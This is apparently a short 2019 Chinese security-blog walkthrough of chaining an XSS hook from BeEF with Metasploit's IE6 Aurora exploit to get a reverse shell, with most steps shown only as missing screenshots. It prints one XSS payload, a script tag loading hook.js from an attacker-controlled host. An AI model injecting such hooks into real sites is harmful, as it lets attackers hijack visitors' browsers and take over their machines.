一次xss到rce

administrator

发表文章数:115

热门标签

,
首页 » Web安全 » 一次xss到rce

本次beef结合msf 完成整个攻击过程
启动beef
beef

一次xss到rce
xss代码(beef生成):
<
sCRiPt> sRC=http://172.16.3.36:3000/hook.js>
本地演示:
一次xss到rce
xss执行
一次xss到rce
配置msf
payload
ms10_002_aurora (ie6 极光漏洞)
配置:
一次xss到rce
开始监听:
一次xss到rce
手动游览器执行:
一次xss到rce
(使用beef重定向到该url也可以)
上线:
一次xss到rce
反弹shell
一次xss到rce
一次xss到rce
一次xss到rce

标签:

免责声明:本站所提供工具、技术文章,仅供技术学习交流、请勿用于非法行为,请遵守相关法律规定,否则后果自负。作者:administrator, 转载或复制请以 超链接形式 并注明出处 大老李的Blog|渗透测试论坛|红蓝对抗|大型Web安全问答社区
原文地址:《一次xss到rce》 发布于2019-03-18

分享到:
赞(0) 打赏 生成海报

评论 1

评论前必须登录!

  注册

  1. #1
    qq_avatar

    很多往事

    皮皮辞2年前 (2019-03-18)

长按图片转发给朋友

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏

关于渗透测试入门到进阶教学
后期的系列课程、问答以及工具、思路分享将会在星球发布
切换注册

登录

忘记密码 ?

切换登录

注册